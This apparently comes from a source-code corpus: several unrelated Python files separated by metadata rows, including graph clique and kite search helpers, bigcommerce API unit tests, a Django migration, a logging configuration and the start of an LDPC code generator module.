    Every neighbour of pair[1] becomes a neighbour of pair[0] (no
    self-loop is created), then row and column pair[1] are dropped.
    Returns a new adjacency matrix; G itself is left untouched.

    Cleanup: the original also wrote -1 "tombstone" markers into the
    row/column being deleted and carried a block of commented-out debug
    printing; both were dead code (the marked row and column are removed
    immediately afterwards) and are gone here.
    """
    newG = [row[:] for row in G]
    for i in range(len(G)):
        if i != pair[0] and G[i][pair[1]] == 1:
            newG[i][pair[0]] = 1
            newG[pair[0]][i] = 1
    # Drop row pair[1], then column pair[1] from every remaining row.
    newG = newG[:pair[1]] + newG[pair[1]+1:]
    for i in range(len(newG)):
        newG[i] = newG[i][:pair[1]] + newG[i][pair[1]+1:]
    return newG
def mergeSubgraphs(t, sub1, sub2):
    """Hajos-sum two edge sets around the triple t = (a, b, c).

    Drops edge (a, c) from sub1 and edge (b, c) from sub2, unions the
    remainders, and adds edge (a, b).  Edges are normalised through
    sortPair (from util; presumably canonicalises endpoint order --
    confirm).  Returns a new set; the inputs are not modified.
    """
    new1 = set()
    for e in sub1:
        new1.add(sortPair(e))
    if sortPair((t[0],t[2])) in new1:
        new1.remove(sortPair((t[0],t[2])))
    new2 = set()
    for e in sub2:
        new2.add(sortPair(e))
    if sortPair((t[1],t[2])) in new2:
        new2.remove(sortPair((t[1],t[2])))
    ret = new1.union(new2)
    ret.add(sortPair((t[0], t[1])))
    return ret
def takeSubgraph(G, edges):
    """Given a graph and an edge list, return (N, vertexList): the
    subgraph adjacency matrix containing only the listed edges, plus the
    sorted list of original vertex indices (vertexList[i] is the
    original index of subgraph vertex i)."""
    vertexSet = set()
    for e in edges:
        vertexSet.add(e[0])
        vertexSet.add(e[1])
    vertexList = sorted(list(vertexSet))
    # m: original vertex index -> compact subgraph index.
    m = {}
    for i in xrange(len(vertexList)):
        m[vertexList[i]] = i
    N = newGraph(len(vertexList))
    for e in edges:
        N[m[e[0]]][m[e[1]]] = 1
        N[m[e[1]]][m[e[0]]] = 1
    return N, vertexList
def edgesToVerts(s):
    """Return the set of vertices touched by the edge collection *s*."""
    return {edge[idx] for edge in s for idx in (0, 1)}
def getAllTripples(G):
    """List every triple (i, j, k) with i < j adjacent and k a common
    non-neighbour of both i and j (k distinct from i and j).

    Ported from Python-2-only ``xrange`` to ``range`` (identical
    iteration order on both interpreters) and expressed as a single
    comprehension.
    """
    n = len(G)
    return [(i, j, k)
            for i in range(n - 1)
            for j in range(i + 1, n)
            if G[i][j]
            for k in range(n)
            if k != i and k != j and not G[i][k] and not G[j][k]]
def getTripplesOnEdge(G, e):
    """List triples (e[0], e[1], i) where i is a common non-neighbour of
    both endpoints of edge e (and not an endpoint itself).

    Ported from Python-2-only ``xrange`` to ``range``.
    """
    return [(e[0], e[1], i)
            for i in range(len(G))
            if i not in e and not G[i][e[0]] and not G[i][e[1]]]
# Return a list of edges that would turn kites into 4-cliques if added.
def getKiteEdges(G):
    """Return the set of absent edges (sortPair-normalised) whose
    addition would complete some "kite" of G into a K4.

    For every triangle (i, j, k) and fourth vertex l adjacent to two of
    its corners, the missing connection to the third corner is added to
    the result set.
    """
    L = set()
    for i in xrange(len(G)-2):
        for j in xrange(i+1,len(G)-1):
            if G[i][j] == 1:
                for k in xrange(j+1,len(G)):
                    if G[i][k]==1 and G[j][k]==1:
                        # We have a triangle.
                        for l in xrange(i+1,len(G)):
                            if l != k and G[l][i]==1 and G[l][j]==1:
                                L.add(sortPair((l, k)))
                            if l != j and G[l][i]==1 and G[l][k]==1:
                                L.add(sortPair((l, j)))
                            if l != i and G[l][k]==1 and G[l][j]==1:
                                L.add(sortPair((l, i)))
    return L
# returns a set of edges forming a double kite or 5 wheel from a defining tripple
def getEdgesFromKite(G,tri):
    """Expand the defining triple *tri* into the full edge set of the
    double-kite / 5-wheel subgraph it describes.

    For each of tri[1] and tri[2], a triangle hanging off tri[0] is
    located and its edges collected.  The result must have 10 or 11
    edges; anything else means the triple did not come from a leaf
    check, in which case a debug dump is printed and the process exits.
    (Python 2 print statements.)
    """
    L = set([sortPair([tri[1], tri[2]])])
    for v in (tri[1], tri[2]):
        done = False
        for i in xrange(len(G)):
            if i in tri:
                continue
            if G[i][tri[0]] and G[i][v]:
                for j in xrange(len(G)):
                    if j in (i,) + tri:
                        continue
                    if G[i][j] and G[j][tri[0]] and G[j][v]:
                        L.add(sortPair((v,i)))
                        L.add(sortPair((v,j)))
                        L.add(sortPair((i,j)))
                        L.add(sortPair((i,tri[0])))
                        L.add(sortPair((j,tri[0])))
                        done = True
                        break
            if done:
                break
    if len(L) not in (10, 11):
        # Bad triple: dump state and abort hard.
        print
        print L
        print tri
        print "Oops"
        print "Cliqie:", hasClique(G)
        exit()
    return L
# returns a set of edges from a 4-clique given as a vertex list C
def getEdgesFromClique(G,C):
    """Return the six edges of the 4-clique C = [a, b, c, d] as a set of
    sortPair-normalised pairs.  G is unused but kept for call-site
    symmetry with the other edge-expansion helpers."""
    L = [ [C[0],C[1]],
          [C[0],C[2]],
          [C[0],C[3]],
          [C[1],C[2]],
          [C[1],C[3]],
          [C[2],C[3]]]
    return set([sortPair(x) for x in L])
# returns the edge set of a clique of any size, given its vertex collection
def getEdgesFromKClique(E):
    """Return every pairwise edge of the vertex collection *E* as a set
    of sortPair-normalised pairs."""
    C = list(E)
    L = set()
    for i in range(len(C)-1):
        for j in range(i+1, len(C)):
            L.add( (C[i], C[j]) )
    return set([sortPair(x) for x in L])
# Get the list of missing edges that could form 4-cliques, and see if any of them pair for an add edge rule.
# (returns true if there is a five wheel or double kite subgraph, kite edge list otherwise)
def leafCheckBase(G):
    """Core leaf test: two kite edges sharing an endpoint whose other
    endpoints are adjacent define the sought subgraph.

    Returns (True, defining_triple) on a hit, where the triple's first
    element is the shared endpoint; otherwise (False, kite_edge_tuple)
    so the caller can reuse the computed edge list.
    """
    edgeList = tuple(getKiteEdges(G))
    for i in xrange(len(edgeList)-1):
        for j in xrange(i+1, len(edgeList)):
            # Four cases: which endpoints of the two edges coincide.
            if edgeList[i][0] == edgeList[j][0] and G[edgeList[i][1]][edgeList[j][1]] == 1:
                return True, (edgeList[i][0], edgeList[i][1], edgeList[j][1])
            if edgeList[i][0] == edgeList[j][1] and G[edgeList[i][1]][edgeList[j][0]] == 1:
                return True, (edgeList[i][0], edgeList[i][1], edgeList[j][0])
            if edgeList[i][1] == edgeList[j][0] and G[edgeList[i][0]][edgeList[j][1]] == 1:
                return True, (edgeList[i][1], edgeList[i][0], edgeList[j][1])
            if edgeList[i][1] == edgeList[j][1] and G[edgeList[i][0]][edgeList[j][0]] == 1:
                return True, (edgeList[i][1], edgeList[i][0], edgeList[j][0])
    return False, edgeList
# Leaf check that expands a hit into the subgraph's full edge set.
def isLeaf(G):
    """Run leafCheckBase; on a hit return (True, subgraph_edge_set),
    otherwise pass through (False, kite_edge_tuple)."""
    r = leafCheckBase(G)
    if r[0]:
        return True, getEdgesFromKite(G, r[1])
    else:
        return r
# Leaf check variant that keeps the raw defining triple instead of the
# expanded edge set.
def isLeafAlt(G):
    """Return (True, defining_triple) on a hit, else (False, False)
    (the kite edge list from leafCheckBase is discarded)."""
    r = leafCheckBase(G)
    if r[0]:
        return r
    else:
        return False, False
def hasClique(G):
    """Search G for a 4-clique; return its six-edge set (via
    getEdgesFromClique) if found, else False."""
    for i in xrange(len(G)-3):
        for j in xrange(i+1,len(G)-2):
            if G[i][j] == 1:
                for k in xrange(j+1,len(G)-1):
                    if G[i][k]==1 and G[j][k]==1:
                        # We have a triangle.
                        for l in xrange(k+1, len(G)):
                            if G[l][i]==1 and G[l][j]==1 and G[l][k]==1:
                                return getEdgesFromClique(G,[i, j, k, l])
    return False
# Memo table for kCliqueRec, keyed on (k, partial-clique frozenset).
# Reset by the hasKclique* entry points before each search.
# (``global`` at module scope is a no-op kept from the original.)
global cliqueCache
cliqueCache = {}
def kCliqueRec(G,k,s):
    """Recursive k-clique extension: try to grow the partial clique *s*
    (a frozenset of vertices, all pairwise adjacent) by *k* more
    vertices.  Returns the completed vertex set or False."""
    if (k, s) in cliqueCache:
        return cliqueCache[(k,s)]
    if k == 0:
        return s
    for i in xrange(len(G)):
        if i not in s:
            # i must be adjacent to every vertex already in the clique.
            con = True
            for v in s:
                if not G[i][v]:
                    con = False
                    break
            if con:
                r = kCliqueRec(G,k-1,s.union([i]))
                if r:
                    cliqueCache[(k,s)] = r
                    return r
    cliqueCache[(k,s)] = False
    return False
def hasKclique(G,k):
    """Search G for a k-clique; return its edge set if found, else False.
    Resets the shared memo table before searching."""
    global cliqueCache
    cliqueCache = {}
    r = kCliqueRec(G,k,frozenset())
    if r:
        r = getEdgesFromKClique(r)
    return r
def hasKcliqueOnEdge(G,k,e):
    """Search for a k-clique containing both endpoints of edge *e*
    (hence k-2 more vertices); return its edge set or False."""
    global cliqueCache
    cliqueCache = {}
    r = kCliqueRec(G,k-2,frozenset(e))
    if r:
        r = getEdgesFromKClique(r)
    return r
def hasCliqueOnEdge(G,e):
    """Search for a 4-clique containing edge *e*; return its edge set
    (via getEdgesFromClique) or False."""
    for k in xrange(len(G)-1):
        if k in e:
            continue
        if G[e[0]][k]==1 and G[e[1]][k]==1:
            # We have a triangle.
            for l in xrange(k+1, len(G)):
                if l in e:
                    continue
                if G[l][e[0]]==1 and G[l][e[1]]==1 and G[l][k]==1:
                    return getEdgesFromClique(G,[e[0],e[1], k, l])
    return False
def getKiteEdgesOnEdge(G, e):
    """Like getKiteEdges, restricted to kites built on triangles that
    contain edge *e*.  Returns a set of sortPair-normalised pairs."""
    L = set()
    for k in xrange(len(G)):
        if G[e[0]][k]==1 and G[e[1]][k]==1:
            # Triangle (e[0], e[1], k); l is the fourth kite vertex.
            for l in xrange(len(G)):
                if l != k and G[l][e[0]]==1 and G[l][e[1]]==1:
                    L.add(sortPair((l, k)))
                if l != e[1] and G[l][e[0]] == 1 and G[l][k] == 1:
                    L.add(sortPair((l, e[1])))
                if l != e[0] and G[l][k]==1 and G[l][e[1]]==1:
                    L.add(sortPair((l, e[0])))
    return L
# Kite-edge scan excluding the vertices of edge e entirely.
# (Original author note: "I don't know what this is".)
def getKiteEdgesEx(G, e):
    """Like getKiteEdges but skipping any triangle or fourth vertex that
    touches an endpoint of *e*.  Returns a list (duplicates possible),
    not a set, and pairs are NOT sortPair-normalised."""
    L = []
    for i in range(len(G)-2):
        if i in e:
            continue
        for j in range(i+1,len(G)-1):
            if j in e:
                continue
            if G[i][j] == 1:
                for k in range(j+1,len(G)):
                    if k in e:
                        continue
                    if G[i][k]==1 and G[j][k]==1:
                        # We have a triangle.
                        for l in range(len(G)):
                            if l in e:
                                continue
                            if G[l][i]==1 and G[l][j]==1:
                                L.append((l, k))
                            if G[l][i]==1 and G[l][k]==1:
                                L.append((l, j))
                            if G[l][k]==1 and G[l][j]==1:
                                L.append((l, i))
    return L
# returns true if double kite, kite edge list otherwise.
def isLeafOnEdge(G, e, edgeList):
    """Incremental leaf check after adding edge *e*: only kite edges
    created by *e* (getKiteEdgesOnEdge) need pairing against the union
    with the previously known *edgeList*.

    Returns (True, subgraph_edge_set) on a hit, otherwise
    (False, updated_edge_set) for reuse by the caller.
    """
    newEdges = getKiteEdgesOnEdge(G,e)
    fullList = newEdges.union(edgeList)
    for e1 in newEdges:
        for e2 in fullList:
            if e1 == e2:
                continue
            if e1[0] == e2[0] and G[e1[1]][e2[1]]:
                return True, getEdgesFromKite(G, (e1[0], e1[1], e2[1]))
            elif e1[0] == e2[1] and G[e1[1]][e2[0]]:
                return True, getEdgesFromKite(G, (e1[0], e1[1], e2[0]))
            elif e1[1] == e2[0] and G[e1[0]][e2[1]]:
                return True, getEdgesFromKite(G, (e1[1], e1[0], e2[1]))
            elif e1[1] == e2[1] and G[e1[0]][e2[0]]:
                return True, getEdgesFromKite(G, (e1[1], e1[0], e2[0]))
    # check if this edge is the base of a double kite.
    # this might be wrong (original author's caveat)
    for e1 in fullList:
        if e[0] in e1:
            for e2 in fullList:
                if e1 == e2:
                    continue
                if e[1] in e2:
                    if e2[0] in e1 or e2[1] in e1:
                        if e1[0] == e2[0] or e1[0] == e2[1]:
                            v = e1[0]
                        elif e1[1] == e2[0] or e1[1] == e2[1]:
                            v = e1[1]
                        return True, getEdgesFromKite(G, (v, e[0], e[1]))
    return False, fullList
# returns true if double kite, kite edge list otherwise.
def isLeafOnEdgeAlt(G, e, edgeList):
    """Variant of isLeafOnEdge that returns the raw defining triple
    rather than the expanded subgraph edge set:
    (True, triple) on a hit, otherwise (False, updated_edge_set)."""
    newEdges = getKiteEdgesOnEdge(G,e)
    fullList = newEdges.union(edgeList)
    for e1 in newEdges:
        for e2 in fullList:
            if e1 == e2:
                continue
            if e1[0] == e2[0] and G[e1[1]][e2[1]]:
                return True, (e1[0], e1[1], e2[1])
            elif e1[0] == e2[1] and G[e1[1]][e2[0]]:
                return True, (e1[0], e1[1], e2[0])
            elif e1[1] == e2[0] and G[e1[0]][e2[1]]:
                return True, (e1[1], e1[0], e2[1])
            elif e1[1] == e2[1] and G[e1[0]][e2[0]]:
                return True, (e1[1], e1[0], e2[0])
    # check if this edge is the base of a double kite.
    # this might be wrong (original author's caveat)
    for e1 in fullList:
        if e[0] in e1:
            for e2 in fullList:
                if e1 == e2:
                    continue
                if e[1] in e2:
                    if e2[0] in e1 or e2[1] in e1:
                        if e1[0] == e2[0] or e1[0] == e2[1]:
                            v = e1[0]
                        elif e1[1] == e2[0] or e1[1] == e2[1]:
                            v = e1[1]
                        return True, (v, e[0], e[1])
    return False, fullList
# returns true if double kite, false otherwise
# performance seems to be unimpressive
def hasDoubleKiteOnEdge(G,e):
    """Return True if edge *e* participates in a double-kite subgraph.

    Phase 1: e lies in a triangle of a single kite; look for a second
    kite sharing the connecting structure.  Phase 2: e is only the
    bridging edge between the tops of two kites.  Debug prints from the
    original are dropped; logic is untouched.
    """
    for i in xrange(len(G)):
        if i in e:
            continue
        if G[i][e[0]] and G[i][e[1]]:
            # Triangle (e[0], e[1], i).
            for j in xrange(len(G)):
                if j in e or j == i:
                    continue
                # v = the kite corner opposite j, depending on which two
                # triangle vertices j is adjacent to.
                v = None
                if G[j][e[0]] and G[j][e[1]]:
                    v = i
                elif G[j][e[0]] and G[j][i]:
                    v = e[1]
                elif G[j][e[1]] and G[j][i]:
                    v = e[0]
                if v != None:
                    # Single kite found; search for the second one
                    # hanging off v or j.
                    for x in (v,j):
                        for k in xrange(len(G)):
                            if k in (v,j):
                                continue
                            if G[x][k]:
                                for l in xrange(len(G)):
                                    if l in (e[0],e[1],i,j,k):
                                        continue
                                    if G[k][l] and G[x][l]:
                                        # another triangle!
                                        for m in xrange(len(G)):
                                            if m in (e[0],e[1],i,j,k,l):
                                                continue
                                            if (G[m][j] or G[m][v]) and G[m][k] and G[m][l]:
                                                return True
    # Not part of a triangle. Is the new edge the connecting edge in any pair of double kites?
    for i in xrange(len(G)-1):
        if i in e:
            continue
        if G[e[0]][i]:
            for j in xrange(i+1,len(G)):
                if j in e:
                    continue
                if G[e[0]][j] and G[e[0]][i] and G[i][j]:
                    # Triangle!
                    for k in xrange(len(G)):
                        if k in e + (i,j):
                            continue
                        if G[i][k] and G[j][k]:
                            # Single kite; k is the top of our kite.
                            for l in xrange(len(G)):
                                if l in e + (i,j,k):
                                    continue
                                if G[l][k] and G[l][e[1]]:
                                    # bridge between end of edge and top of kite
                                    for m in xrange(len(G)):
                                        if m in e + (i,j,k,l):
                                            continue
                                        if G[m][l] and G[m][k] and G[m][e[1]]:
                                            return True
    return False
| 31.809917 | 108 | 0.412679 |
3aac3f6414867b633dea9c7d45394cdd79f87b50 | 39 | py | Python | cont.py | peterkimutai/continue1 | fe6dd88f6beeb0a93a41deef942d753b0d914cbc | [
"Unlicense"
] | null | null | null | cont.py | peterkimutai/continue1 | fe6dd88f6beeb0a93a41deef942d753b0d914cbc | [
"Unlicense"
] | null | null | null | cont.py | peterkimutai/continue1 | fe6dd88f6beeb0a93a41deef942d753b0d914cbc | [
"Unlicense"
] | null | null | null |
# Toy script: prints the two strings with a literal " and " between them
# (print's default separator adds the surrounding spaces).
i="meee"
u="you"
print(i," and ",u)
| 5.571429 | 18 | 0.487179 |
3aac4e1d77f4bf335aa448746527f97c1db73e42 | 2,085 | py | Python | tests/test_api.py | sebaacuna/bigcommerce-api-python | 59ef206d7296c196a0ae0400b6bf9bdb5c2f72af | [
"MIT"
] | null | null | null | tests/test_api.py | sebaacuna/bigcommerce-api-python | 59ef206d7296c196a0ae0400b6bf9bdb5c2f72af | [
"MIT"
] | null | null | null | tests/test_api.py | sebaacuna/bigcommerce-api-python | 59ef206d7296c196a0ae0400b6bf9bdb5c2f72af | [
"MIT"
] | null | null | null | import unittest
import bigcommerce.api
from bigcommerce.connection import Connection, OAuthConnection
from bigcommerce.resources import ApiResource
from mock import MagicMock, patch, Mock
class TestBigcommerceApi(unittest.TestCase):
    """Tests covering BigcommerceApi construction and connection selection."""

    def test_create_basic(self):
        # Basic-auth credentials must produce a plain (non-OAuth) connection.
        client = bigcommerce.api.BigcommerceApi(host='store.mybigcommerce.com',
                                                basic_auth=('admin', 'abcdef'))
        self.assertIsInstance(client.connection, Connection)
        self.assertNotIsInstance(client.connection, OAuthConnection)

    def test_create_oauth(self):
        # OAuth-style arguments must produce an OAuthConnection.
        client = bigcommerce.api.BigcommerceApi(client_id='123456',
                                                store_hash='abcdef',
                                                access_token='123abc')
        self.assertIsInstance(client.connection, OAuthConnection)

    def test_create_incorrect_args(self):
        # Mixing OAuth and basic-auth arguments is rejected.
        self.assertRaises(
            Exception,
            lambda: bigcommerce.api.BigcommerceApi(client_id='123',
                                                   basic_auth=('admin', 'token')))
class TestApiResourceWrapper(unittest.TestCase):
    """Tests covering ApiResourceWrapper construction and delegation."""

    def test_create(self):
        # The wrapper accepts either the class name as a string or the
        # class object itself, and adopts the api's connection.
        api = MagicMock()
        api.connection = MagicMock()
        by_name = bigcommerce.api.ApiResourceWrapper('ApiResource', api)
        self.assertEqual(api.connection, by_name.connection)
        self.assertEqual(by_name.resource_class, ApiResource)
        by_class = bigcommerce.api.ApiResourceWrapper(ApiResource, api)
        self.assertEqual(by_class.resource_class, ApiResource)

    def test_str_to_class(self):
        # Known names resolve to the class; unknown names raise AttributeError.
        resolved = bigcommerce.api.ApiResourceWrapper.str_to_class('ApiResource')
        self.assertEqual(resolved, ApiResource)
        self.assertRaises(
            AttributeError,
            lambda: bigcommerce.api.ApiResourceWrapper.str_to_class(
                'ApiResourceWhichDoesNotExist'))

    @patch.object(ApiResource, 'get')
    def test_get_attr(self, patcher):
        # Attribute access is forwarded to the resource class, with the
        # wrapper's connection injected as a keyword argument.
        api = MagicMock()
        api.connection = MagicMock()
        expected = {'id': 1}
        patcher.return_value = expected
        wrapper = bigcommerce.api.ApiResourceWrapper('ApiResource', api)
        self.assertEqual(wrapper.get(1), expected)
        patcher.assert_called_once_with(1, connection=api.connection)
| 36.578947 | 130 | 0.729976 |
3aad54a74724c543c7739f87f3d7419f9de3dd0e | 638 | py | Python | media.py | anuraglahon16/Make_a_movie_website | 4d5371b7cc1286f2444376a221595d8c6bb0d492 | [
"MIT"
] | null | null | null | media.py | anuraglahon16/Make_a_movie_website | 4d5371b7cc1286f2444376a221595d8c6bb0d492 | [
"MIT"
] | null | null | null | media.py | anuraglahon16/Make_a_movie_website | 4d5371b7cc1286f2444376a221595d8c6bb0d492 | [
"MIT"
] | null | null | null | """Defines the Movie class"""
import webbrowser
class Movie(object):
    """Container for the details of a single movie.

    Attributes:
        title: Display title of the movie.
        storyline: Short plot summary.
        poster_image_url: URL of the poster artwork.
        trailer_youtube_url: URL of the YouTube trailer.
        release_date: Release date of the movie.
    """

    def __init__(self, movie_title, movie_storyline, poster_image,
                 trailer_youtube, movie_release_date):
        """Store the supplied movie details on the instance."""
        self.release_date = movie_release_date
        self.trailer_youtube_url = trailer_youtube
        self.poster_image_url = poster_image
        self.storyline = movie_storyline
        self.title = movie_title

    def show_trailer(self):
        """Open the trailer URL in the default web browser."""
        webbrowser.open(self.trailer_youtube_url)
| 33.578947 | 72 | 0.677116 |
3aad9a8258616eab59c6be93afe08dd7ebf88b02 | 722 | py | Python | slalom/migrations/0003_auto_20210502_2148.py | caro-oviedo/DjangoApp2-UserProgress-Salom | 5f3adf796764dd880f4761c818997f75516f2c24 | [
"Apache-2.0"
] | null | null | null | slalom/migrations/0003_auto_20210502_2148.py | caro-oviedo/DjangoApp2-UserProgress-Salom | 5f3adf796764dd880f4761c818997f75516f2c24 | [
"Apache-2.0"
] | null | null | null | slalom/migrations/0003_auto_20210502_2148.py | caro-oviedo/DjangoApp2-UserProgress-Salom | 5f3adf796764dd880f4761c818997f75516f2c24 | [
"Apache-2.0"
] | null | null | null | # Generated by Django 3.2 on 2021-05-02 21:48
from django.db import migrations, models
class Migration(migrations.Migration):
    """Auto-generated Django migration: adds video1/video2/video3 to Trick."""

    # Applies on top of migration 0002_remove_trick_owner in the slalom app.
    dependencies = [
        ('slalom', '0002_remove_trick_owner'),
    ]

    # Each AddField supplies a non-null string default so existing rows
    # are backfilled when the column is created.
    operations = [
        migrations.AddField(
            model_name='trick',
            name='video1',
            field=models.CharField(default='1', max_length=250),
        ),
        migrations.AddField(
            model_name='trick',
            name='video2',
            field=models.CharField(default='2', max_length=250),
        ),
        migrations.AddField(
            model_name='trick',
            name='video3',
            field=models.CharField(default='3', max_length=250),
        ),
    ]
| 24.896552 | 64 | 0.558172 |
3ab1c994ef22b2ed6be0bfd91c5d34915c683650 | 629 | py | Python | sync_binlog/output_log.py | liusl104/py_sync_binlog | 33a67f545159767d38a522d28d2f79b3ac3802ca | [
"Apache-2.0"
] | 3 | 2018-09-18T03:29:33.000Z | 2020-01-13T03:34:39.000Z | sync_binlog/output_log.py | liusl104/py_sync_binlog | 33a67f545159767d38a522d28d2f79b3ac3802ca | [
"Apache-2.0"
] | null | null | null | sync_binlog/output_log.py | liusl104/py_sync_binlog | 33a67f545159767d38a522d28d2f79b3ac3802ca | [
"Apache-2.0"
] | 1 | 2022-01-25T09:39:17.000Z | 2022-01-25T09:39:17.000Z | # encoding=utf8
import logging # 引入logging模块
from logging.handlers import TimedRotatingFileHandler
from sync_conf import log_bese_path, log_backup_count, log_msg_level
# 日志
logfile = log_bese_path + '/logs/' + 'binlog_sync.log'
logger = logging.getLogger()
logger.setLevel(log_msg_level)
# 按日分割日志,默认日志保留7份
fh = TimedRotatingFileHandler(logfile, when='D', interval=1, backupCount=log_backup_count)
# datefmt = '%Y-%m-%d %H:%M:%S'
format_str = "%(asctime)s - %(filename)s[line:%(lineno)d] - %(levelname)s: %(message)s"
formatter = logging.Formatter(format_str, datefmt=None)
fh.setFormatter(formatter)
logger.addHandler(fh)
| 28.590909 | 90 | 0.761526 |
3ab2efc455ab899be68173e51b6cd65e6052c754 | 12,208 | py | Python | src/LDPC/pycodes/build/lib.cygwin-1.5.10-i686-2.3/pycodes/utils/CodeMaker.py | Horacehxw/Multi-label | 76095c72327e9aa379eaa653dbbb775ca638e6db | [
"MIT"
] | 1 | 2019-04-24T15:24:48.000Z | 2019-04-24T15:24:48.000Z | src/LDPC/pycodes/utils/CodeMaker.py | Horacehxw/Multi-label | 76095c72327e9aa379eaa653dbbb775ca638e6db | [
"MIT"
] | null | null | null | src/LDPC/pycodes/utils/CodeMaker.py | Horacehxw/Multi-label | 76095c72327e9aa379eaa653dbbb775ca638e6db | [
"MIT"
] | null | null | null | """
Copyright 2003 Mitsubishi Electric Research Laboratories All Rights
Reserved. Permission to use, copy and modify this software and its
documentation without fee for educational, research and non-profit
purposes, is hereby granted, provided that the above copyright
notice and the following three paragraphs appear in all copies.
To request permission to incorporate this software into commercial
products contact: Vice President of Marketing and Business
Development; Mitsubishi Electric Research Laboratories (MERL), 201
Broadway, Cambridge, MA 02139 or <license@merl.com>.
IN NO EVENT SHALL MERL BE LIABLE TO ANY PARTY FOR DIRECT, INDIRECT,
SPECIAL, INCIDENTAL, OR CONSEQUENTIAL DAMAGES, INCLUDING LOST
PROFITS, ARISING OUT OF THE USE OF THIS SOFTWARE AND ITS
DOCUMENTATION, EVEN IF MERL HAS BEEN ADVISED OF THE POSSIBILITY OF
SUCH DAMAGES.
MERL SPECIFICALLY DISCLAIMS ANY WARRANTIES, INCLUDING, BUT NOT
LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
FOR A PARTICULAR PURPOSE. THE SOFTWARE PROVIDED HEREUNDER IS ON AN
``AS IS'' BASIS, AND MERL HAS NO OBLIGATIONS TO PROVIDE MAINTENANCE,
SUPPORT, UPDATES, ENHANCEMENTS OR MODIFICATIONS.
"""
"""
The CodeMaker package contains function to create regular and irregular
Gallager codes. For example, to create a 3,6 Gallager code
of block length 30 and dimension 15, you could do
>>> regL = make_H_gallager(30,3,6)
To create an irregular Gallager code with 4 variables of degree 1,
4 variables of degree 2, 2 variables of degree 3, 3 checks of degree 2,
and 4 checks of degree 3, you could do
>>> iregL = MakeIrregularLDPCCode(10,3,{1:4,2:4,3:2},{2:3,3:4})
To create an irregular Gallager code with degree sequences
lambda(x) = 0.33241 x^2 + 0.24632 x^3 + 0.11014 x^4 + 0.31112 x^6
rho(x) = 0.76611 x^6 + 0.23380 x^7 you could do
>>> iregL = MakeIrregularLDPCCodeFromLambdaRho(30,15,{2:0.33241, 3:.24632, 4:.11014, 6:0.31112},{6:.76611, 7:.23389})
Finally, note that although it is possible to make regular
Gallager codes using the Irregular code functions,
YOU SHOULD NOT DO THAT. The irregular code functions
only give you approximatley the degree sequence you request
due to issues with randomly adding edges and removing
redundant edges.
"""
import time, copy, random
CodeMakerVersion = 1.0  # version stamp recorded in files generated by WriteNewRegularGallagerCode
def DotProduct(x,y):
    """Return the dot product of the equal-length sequences x and y.

    Python 2 idiom: map() with a two-argument lambda pairs the sequences,
    and the builtin reduce sums the products.
    """
    pairwise = map(lambda a, b: a * b, x, y)
    return reduce(lambda acc, term: acc + term, pairwise)
def randperm(N):
    """Return a random permutation of [0, 1, ..., N-1].

    Uses rejection sampling: each value in turn is placed at a randomly
    drawn slot, re-drawing until an empty slot is found.
    """
    slots = [None] * N
    for value in range(N):
        pos = random.randrange(N)
        while slots[pos] is not None:
            pos = random.randrange(N)
        slots[pos] = value
    return slots
def make_H_gallager(N,col_w,row_w):
    """
    make_H_gallager(N,col_w,row_w):
    N:       Length of code.
    col_w:   Column weight of code (i.e., how many 1's in a column).
    row_w:   Row weight of code (i.e., how many 1's in a row).
    Create a regular LDPC code matrix using the construction in
    Gallager's book and return the result as a link array.  The
    return value, r, is a list of N lists where r[i][j] is the
    ith one in the jth row of H.
    The algorithm works by starting with a sub-matrix of n/row_w rows
    containing col_w 1's in the first positions in the first row,
    col_w 1's in the next set of positions in the second row, etc.
    H = [ 1 1 1 1 0 0 0 0 0 0 0 0 ...
          0 0 0 0 1 1 1 1 0 0 0 0 ...
          0 0 0 0 0 0 0 0 1 1 1 1 ...
          ...........................
    Next we create col_w-1 additional submatricies which are permuations of
    this and append them to the bottom of H.
    (Python 2 source: `/` below is integer division.)
    """
    num_rows = (N * col_w) / row_w
    num_sub_rows = num_rows / col_w
    assert row_w*num_rows == N*col_w, 'N*col_w not divisible by row_w'
    assert (N/row_w)*row_w == N, 'N not divisible by row_w'
    # First sub-matrix: row i holds columns [i*row_w, (i+1)*row_w).
    H_sub = [0]*num_sub_rows
    for i in range(num_sub_rows):
        H_sub[i] = map(lambda x,y: x + y,[i*row_w]*row_w,range(row_w))
    H = copy.deepcopy(H_sub)
    # Each further sub-matrix applies a fresh random column permutation
    # to H_sub, keeping each row's column indices sorted.
    for i in range(col_w-1):
        H_new_sub = [0]*num_sub_rows
        for m in range(num_sub_rows):
            H_new_sub[m] = [0]*row_w
        rand_perm = randperm(N)
        for j in range(num_sub_rows):
            for k in range(row_w):
                H_new_sub[j][k] = rand_perm[H_sub[j][k]]
            l = list(H_new_sub[j])
            l.sort()
            H_new_sub[j] = l
        H = H + copy.deepcopy(H_new_sub)
    return H
def WriteNewRegularGallagerCode(N,col_w,row_w,fileName):
    """
    Routine to create a new Gallager Code and write it to a file.

    N:        code length, col_w/row_w: column/row weights (see
              make_H_gallager), fileName: output path (overwritten).
    The file records the CodeMaker version, the random generator state,
    and the command used, then a `linkArray = ...` assignment holding
    the generated link array.  (Python 2 source: backquotes are repr().)
    """
    fd = open(fileName,'w')
    fd.write('# Created code using CodeMaker.py version ' + `CodeMakerVersion`
             + '.\n# Random seed = ' + `random.getstate()` + '.\n')
    fd.write('# Command used = WriteNewRegularGallagerCode(%i,%i,%i,"%s") '
             % (N, col_w, row_w, fileName))
    fd.write('\n\nlinkArray = ' + `make_H_gallager(N,col_w,row_w)`)
    fd.write('\n\n')
    fd.close()
def MakeIrregularLDPCCode(N,K,varDegrees,checkDegrees):
    """
    MakeIrregularLDPCCode(N,K,checkDegrees,varDegrees):
    N:             Length of the code.
    K:             Dimension of the code.
    checkDegrees:  Hash indicating how many checks have 1 connection,
                   2 connections, 3 connections, etc.
    varDegrees:    Hash indicating how many vars have 1 connection,
                   2 connections, 3 connections, etc.
    Returns a a list L which is a randomly constructed link
    array for the desired code.  Note the current approach of
    preventing multi-edges is to not add a redundant edge.  This
    ends up producing a graph with slightly lower degrees than
    specified.  If instead we keep trying to add edges to
    exactly match the desired degrees the function sometimes
    gets stuck and doesn't finish.
    """
    M = N - K
    # Sanity checks: degree counts must account for exactly M checks,
    # N variables, and an equal number of edge stubs on both sides.
    numChecks = reduce(lambda x,y:x+y, checkDegrees.values())
    assert numChecks == M, (
        'Number of checks in checkDegrees sums to ' + `numChecks` +
        '!=' + `M` + '.')
    assert reduce(lambda x,y:x+y, varDegrees.values()) == N, (
